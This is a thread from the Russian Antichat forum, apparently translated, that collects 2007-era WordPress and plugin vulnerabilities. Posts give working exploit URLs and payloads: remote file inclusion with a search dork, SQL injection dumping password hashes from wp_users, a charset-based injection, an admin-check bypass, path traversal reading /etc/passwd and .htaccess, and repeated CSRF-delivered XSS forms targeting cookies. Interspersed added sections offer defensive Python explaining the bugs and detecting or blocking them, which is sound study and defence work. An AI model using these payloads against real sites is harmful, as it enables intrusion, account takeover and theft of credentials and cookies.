Antichat is available again.
The Antichat forum is back and open to users once more.
Security, programming, technology and much more are discussed here.
The community is gathering together again.
New address: forum.antichat.xyz

21.10.2007, 16:45
Forum member
Registered: 19.05.2007
Posts: 228
Time on forum: 4325663
Reputation: 240
Path disclosure
Code:
http://[target]/[path]/wp-content/plugins/akismet/akismet.php

28.10.2007, 03:32
Moderator - Level 7
Registered: 28.04.2007
Posts: 547
Time on forum: 5516499
Reputation: 3702

01.11.2007, 19:21
Regular
Registered: 23.09.2007
Posts: 416
Time on forum: 1781065
Reputation: 869
WordPress Plugin BackUpWordPress <= 0.4.2b RFI Vulnerability
Code:
#Author: S.W.A.T.
#cont@ct: svvateam@yahoo.com
--------------------------------------------------------------------------------
Application : BackUpWordPress 0.4.2b
Download : http://wordpress.designpraxis.at/download/backupwordpress.zip
--------------------------------------------------------------------------------
Vuln :
require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php";
--------------------------------------------------------------------------------
Exploit:
http://[target]/[path]/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3?
http://[target]/[path]/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3?
http://[target]/[path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3?
http://[target]/[path]/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3?
& other Files & Folders In The [Archive] Folder
--------------------------------------------------------------------------------
Dork:
"inurl:/plugins/BackUp"
Mirror:
http://www.milw0rm.com/exploits/4593

05.12.2007, 21:23
Regular
Registered: 23.09.2007
Posts: 416
Time on forum: 1781065
Reputation: 869
Sql Injection in wordpress 2.3.1
Code:
Author : Beenu Arora
Mail : beenudel1986 (at) gmail (dot) com [email concealed]
Application : WordPress (2.3.1)
Homepage: http://wordpress.org/
~~~~~~~~~~~~~~~~~~SQL Injection ~~~~~~~~~~~~
Vulnerable URL : http://localhost/path_to_wordpress/?feed=rss2&p=
Parameter : p
POC = http://localhost/path_to_wordpress/?feed=rss2&p=11/**/union/**/select/**/concat(user_password,char(100),username),2/**/from/**/wp_users/**/where/**/user_id=1/*
Source: http://www.securityfocus.com/archive/1/484608

11.12.2007, 20:29
Moderator - Level 7
Registered: 28.04.2007
Posts: 547
Time on forum: 5516499
Reputation: 3702

11.12.2007, 21:47
Regular
Registered: 23.09.2007
Posts: 416
Time on forum: 1781065
Reputation: 869
WordPress Charset SQL Injection Vulnerability
Insufficient filtering when the database uses the GBK charset leads to SQL injection.
(Article describing the vulnerability on Antichat: https://forum.antichat.ru/thread62109.html)
Exploit:
http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23
_http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html
Code:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=== WordPress Charset SQL Injection Vulnerability ===
Release date: 2007-12-10
Last modified: 2007-12-10
Source: Abel Cheung
Affected version: WordPress escape($gpc);
}
Finally, escape() method belongs to wp-includes/wp-db.php:
function escape($string) {
return addslashes( $string ); // Disable rest for now, causing problems
......
}
3. Proof of concept
a. After WordPress installation, modify wp-config.php to make sure
it uses certain character set for database connection (Big5 can
also be used):
define('DB_CHARSET', 'GBK');
b. http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23
4. Workaround
Note: This vulnerability only exists for database queries performed
using certain character sets. For databases created in most other
character sets no remedy is needed.
a. It is recommended to convert WordPress database to use character sets not
vulnerable to such SQL exploit. One such charset is UTF-8, which does not
use backslash ('\') as part of character and it supports various languages.
b. Alternatively, edit WordPress theme to remove search capability.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: http://firegpg.tuxfamily.org
iD8DBQFHXVXGQVLh8cZxhv8RAgjgAKDwvrrO6hJbnV0/VFah5W+i8grYcwCgzyCT
5RKJG+zo/mktmRU3v1IfmXE=
=2okr
-----END PGP SIGNATURE-----
Last edited by Elekt; 02.05.2008 at 00:35.
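Added illustration of the mechanism behind Abel Cheung's advisory above (example code written for this page, not from the thread, the advisory or WordPress): a byte-oriented addslashes() puts 0x5C in front of the quote, and under GBK the preceding lead byte 0xB3 plus that 0x5C form one two-byte character, so the quote is left bare; under UTF-8 a 0x5C byte can never be part of a multibyte character. The functions addslashes, escape_for_charset, decode_as_server, quote_still_escaped and compare, and the PAYLOAD constant, are constructed here; Python's codecs stand in for how the MySQL server interprets the connection charset.

```python
import re

# The byte set PHP's addslashes() prefixes with a backslash: ' " \ NUL
ESCAPED_BYTES = (0x27, 0x22, 0x5C, 0x00)

# Constructed: the two bytes behind s=%b3%27 at the start of the PoC URL above
PAYLOAD = b"\xb3'"


def addslashes(data: bytes, charset: str = "") -> bytes:
    """Byte-oriented escaping like PHP's addslashes(). The charset argument is
    accepted only so both escapers share a signature; it is ignored, which is
    exactly the defect being shown."""
    out = bytearray()
    for b in data:
        if b in ESCAPED_BYTES:
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def escape_for_charset(data: bytes, charset: str) -> bytes:
    """Connection-charset-aware escaping in the spirit of mysql_real_escape_string():
    interpret the bytes as characters of `charset` first, escape per character,
    then re-encode. The backslash is inserted between characters rather than
    between bytes, so no multibyte character can absorb it as a trail byte."""
    text = data.decode(charset, errors="replace")
    escaped = re.sub(r"([\\'\"\x00])", r"\\\1", text)
    return escaped.encode(charset, errors="replace")


def decode_as_server(escaped: bytes, charset: str) -> str:
    """What the server sees: the escaped bytes read in the connection charset."""
    return escaped.decode(charset, errors="replace")


def quote_still_escaped(escaped: bytes, charset: str) -> bool:
    """True if every single quote in the server's view is still preceded by a
    backslash; False means a bare quote survived and the string literal can be
    closed early."""
    return re.search(r"(?<!\\)'", decode_as_server(escaped, charset)) is None


def compare(charset: str) -> dict:
    """For one connection charset, report whether the quote in PAYLOAD remains
    escaped after addslashes() and after charset-aware escaping."""
    return {
        "addslashes": quote_still_escaped(addslashes(PAYLOAD), charset),
        "charset_aware": quote_still_escaped(escape_for_charset(PAYLOAD, charset), charset),
    }


if __name__ == "__main__":
    for cs in ("gbk", "big5", "utf-8"):
        print(cs, compare(cs), "server sees:", repr(decode_as_server(addslashes(PAYLOAD), cs)))
```

Under gbk the addslashes() output decodes to just two characters (a CJK ideograph followed by a bare quote), which is the whole bug; under utf-8 it decodes to three and the quote stays escaped, matching the advisory's UTF-8 workaround. Escaping per character is what a connection-aware escape does; prepared statements, the subject of the ilia.ws link above, avoid splicing the value into SQL text at all.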

16.12.2007, 01:49
Regular
Registered: 23.09.2007
Posts: 416
Time on forum: 1781065
Reputation: 869
Wordpress 2.3.1 - Broken Access Control is_admin()
Obtaining admin privileges, bypassing the password.
How to use: _http://forum.antichat.ru/showpost.php?p=729009&postcount=63
Code:
By Michael Brooks
Vulnerability: Broken Access Control
Homepage: http://wordpress.org/download
Software: Wordpress
Version affected: 2.3.1 (Latest at the time of writing)
The impact of the flaw is that an attacker can read posts while they are still drafts. This is an ability that only the administrator should have. Imagine a stranger being able to read the news before it is published. Or perhaps a spam-blog harvesting posts before they are published.
This flaw is because Wordpress is trusting the $_SERVER['REQUEST_URI'] global variable. Manipulation of $_SERVER['REQUEST_URI'] has led to many XSS flaws. Although an attacker shouldn't be able to control all $_SERVER variables, none of them should be trusted.
Exploit:
http://localhost/wordpress/'wp-admin/
This will cause both $_SERVER['REQUEST_URI'] and $_SERVER['PHP_SELF'] to contain the value:
http://localhost/wordpress/'wp-admin/
Vulnerable function:
line 34, in ./wp-includes/query.php.
function is_admin () {
global $wp_query;
return ($wp_query->is_admin || (stripos($_SERVER['REQUEST_URI'], 'wp-admin/') !== false));
}
The same flaw is duplicated again on line 645 of the same file.
This url: http://localhost/wordpress/'wp-admin/
will cause the is_admin() function to return true. This flaw works regardless of register_globals or magic_quotes_gpc. The attack fails when search engine friendly urls are turned on in wordpress, however this option is turned off by default. Turning search engine friendly urls on is a workaround until a patch is created.
Last edited by Elekt; 13.06.2008 at 09:18.
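Added example for the is_admin() post above (written for this page; not from the thread, Michael Brooks' advisory or WordPress, and is_admin_path is an illustration rather than WordPress's actual patch): the substring test on the raw REQUEST_URI is reproduced, a path-based test is shown beside it, and a small log check flags requests where the two disagree. The function names, the site root "/wordpress" and the access-log lines in SAMPLE_LOG are constructed for the example.

```python
import posixpath
import re
from typing import List, Tuple
from urllib.parse import unquote, urlsplit

ADMIN_DIR = "wp-admin"


def is_admin_substring(request_uri: str) -> bool:
    """The REQUEST_URI half of the check quoted in the advisory: true whenever
    'wp-admin/' occurs anywhere in the raw URI, case-insensitively like PHP's
    stripos. A stray quote, a query parameter or an unrelated segment all count."""
    return "wp-admin/" in request_uri.lower()


def is_admin_path(request_uri: str, site_root: str = "/wordpress") -> bool:
    """Path-based alternative: keep only the URI path, percent-decode and
    normalise it, and require that the admin directory is exactly the first
    segment below the site root. The query string is discarded, '..' is
    collapsed, and "'wp-admin" is a different segment from "wp-admin"."""
    path = posixpath.normpath(unquote(urlsplit(request_uri).path))
    prefix = posixpath.normpath(site_root).rstrip("/") + "/"
    if not path.startswith(prefix):
        return False
    return path[len(prefix):].split("/", 1)[0] == ADMIN_DIR


# Constructed combined-format access-log lines; the quoted-apostrophe request
# mirrors the advisory's exploit URL, the last one hides the marker in a query.
SAMPLE_LOG: List[str] = [
    '203.0.113.7 - - [16/Dec/2007:01:49:10 +0300] "GET /wordpress/\'wp-admin/ HTTP/1.1" 200 4821',
    '198.51.100.2 - - [16/Dec/2007:01:50:02 +0300] "GET /wordpress/wp-admin/ HTTP/1.1" 302 0',
    '198.51.100.2 - - [16/Dec/2007:01:51:40 +0300] "GET /wordpress/?p=7 HTTP/1.1" 200 9001',
    '203.0.113.7 - - [16/Dec/2007:01:52:11 +0300] "GET /wordpress/?s=wp-admin/ HTTP/1.1" 200 4810',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)


def flag_admin_marker_outside_path(log_lines: List[str], site_root: str = "/wordpress") -> List[Tuple[str, str]]:
    """Detection view: (ip, uri) for requests on which the two checks disagree,
    i.e. the URI carries the 'wp-admin/' marker but is not a request into the
    admin path. On an unpatched 2.3.1 these are the requests that would have
    flipped is_admin() without ever touching wp-admin/."""
    hits: List[Tuple[str, str]] = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        uri = m.group("uri")
        if is_admin_substring(uri) and not is_admin_path(uri, site_root):
            hits.append((m.group("ip"), uri))
    return hits


if __name__ == "__main__":
    for uri in ("/wordpress/'wp-admin/", "/wordpress/wp-admin/", "/wordpress/?s=wp-admin/"):
        print(uri, is_admin_substring(uri), is_admin_path(uri))
    print(flag_admin_marker_outside_path(SAMPLE_LOG))
```

The path check does not depend on the permalink setting, so it does not rely on the "search engine friendly urls" workaround the advisory mentions; the log check is the same comparison run after the fact over whatever the web server recorded.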

25.12.2007, 21:45
[Deprived of self-expression
Registered: 16.01.2005
Posts: 1,787
Time on forum: 9751379
Reputation: 3812
Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
Code:
Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
D.Script : http://downloads.wordpress.org/plugin/pictpress.release-0.91.zip
Vuln Code :
In Line 5,6,7,8 :
$path = $_GET['path'];
$size = $_GET['size'];
$base = dirname(__FILE__) . "/..";
$cache = "$base/cache/$size/$path";
In Line 22 :
readfile($cache);
POC :
/wp-content/plugins/pictpress/resize.php?size=../../../../../../../../../../&path=/etc/passwd%00
# milw0rm.com [2007-12-05]

25.12.2007, 21:52
[Deprived of self-expression
Registered: 16.01.2005
Posts: 1,787
Time on forum: 9751379
Reputation: 3812
XSS in WP-ContactForm <= 2.0.7
For attacking admin only (at options page):
1
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_email" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
2
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_subject" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
3
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_question" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
4
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_answer" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
=====
For attacking every user of the site (at contact page):
5
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_question" value="<script>alert(document.cookie)</script>" />
</form>
</body>
</html>
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<body>
<iframe src="http://site/contact/" width="0" height="0"></iframe>
</body>
</html>
======
For attacking every user of the site at contact page (and admin at options page):
6
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_success_msg" value="</textarea><script>alert(document.cookie)</script>" />
</form>
</body>
</html>
7
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_error_msg" value="</textarea><script>alert(document.cookie)</script>" />
</form>
</body>
</html>
======
For attacking every user of the site (at contact page):
8
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_answer" value="4" />
<input type="hidden" name="wpcf_success_msg" value="<script>alert(document.cookie)</script>" />
</form>
</body>
</html>
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/contact/" method="post">
<input type="hidden" name="wpcf_stage" value="process" />
<input type="hidden" name="wpcf_your_name" value="test" />
<input type="hidden" name="wpcf_email" value="test@test.test" />
<input type="hidden" name="wpcf_response" value="4" />
<input type="hidden" name="wpcf_msg" value="XSS" />
</form>
</body>
</html>
9
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_error_msg" value="<script>alert(document.cookie)</script>" />
</form>
</body>
</html>
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/contact/" method="post">
<input type="hidden" name="wpcf_stage" value="process" />
<input type="hidden" name="wpcf_msg" value="XSS" />
</form>
</body>
</html>
Last edited by +toxa+; 25.12.2007 at 21:55.

03.01.2008, 16:43
[Deprived of self-expression
Registered: 16.01.2005
Posts: 1,787
Time on forum: 9751379
Reputation: 3812
directory traversal vulnerabilities in WP 2.0.11(win only)
PHP code:
function validate_file(..)
if (false !== strpos($file, './'))
Code:
Proof of concept:
http://site/wp-admin/index.php?page=\..\..\.htaccess
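Added example covering both the PictPress readfile() post and the WP 2.0.11 validate_file() post above (written for this page; not from the thread, either advisory, PictPress or WordPress): a validator that rejects what each of those checks let through (a NUL byte, an absolute path, and '..' segments written with either slash style, since a test for the literal './' misses '\..\'), plus a realpath-based containment test so the final path is proven to stay under the intended directory. The function names, the "$base/cache/$size/$path" stand-in cached_image_path, and the temporary fixture built by build_demo_tree are constructed for this example.

```python
import os
import tempfile
from typing import Optional


def validate_relative_file(user_path: str) -> bool:
    """Accept only a plain relative path. Rejects an empty value, NUL bytes
    (which truncate the filename at the C level, as in the %00 PoC), absolute
    paths and drive letters, and any '.' or '..' segment. Backslashes are
    treated as separators too, which is the gap in the './' substring check:
    a Windows-style '\\..\\' contains no './' at all."""
    if not user_path or "\x00" in user_path:
        return False
    normalised = user_path.replace("\\", "/")
    if normalised.startswith("/") or (len(normalised) > 1 and normalised[1] == ":"):
        return False
    return all(seg not in ("", ".", "..") for seg in normalised.split("/"))


def resolve_inside(base_dir: str, *parts: str) -> Optional[str]:
    """Join user-controlled parts under base_dir and return the canonical path
    only if it still lies inside base_dir, else None. realpath() collapses '..'
    and follows symlinks, so the containment test holds even for an input the
    string validator did not anticipate."""
    if not all(validate_relative_file(p) for p in parts):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, *parts))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def cached_image_path(plugin_dir: str, size: str, path: str) -> Optional[str]:
    """Hardened counterpart of the PictPress lookup "$base/cache/$size/$path":
    both request parameters must pass the validator and the result must stay
    under cache/, otherwise there is nothing to readfile()."""
    return resolve_inside(os.path.join(plugin_dir, "cache"), size, path)


def build_demo_tree() -> str:
    """Constructed fixture: a throwaway plugin directory holding cache/300/pic.jpg."""
    plugin_dir = tempfile.mkdtemp(prefix="pictpress-demo-")
    os.makedirs(os.path.join(plugin_dir, "cache", "300"))
    with open(os.path.join(plugin_dir, "cache", "300", "pic.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xd9")  # JPEG start/end markers; content is irrelevant
    return plugin_dir


if __name__ == "__main__":
    d = build_demo_tree()
    print(cached_image_path(d, "300", "pic.jpg"))
    print(cached_image_path(d, "../../../../../../../../../../", "/etc/passwd\x00"))
    print(validate_relative_file("\\..\\..\\.htaccess"), validate_relative_file("index.php"))
```

The two layers are deliberately redundant: the validator gives a clear rejection for the inputs in both PoCs, and the realpath containment check is the guarantee that holds regardless of how the string was spelled.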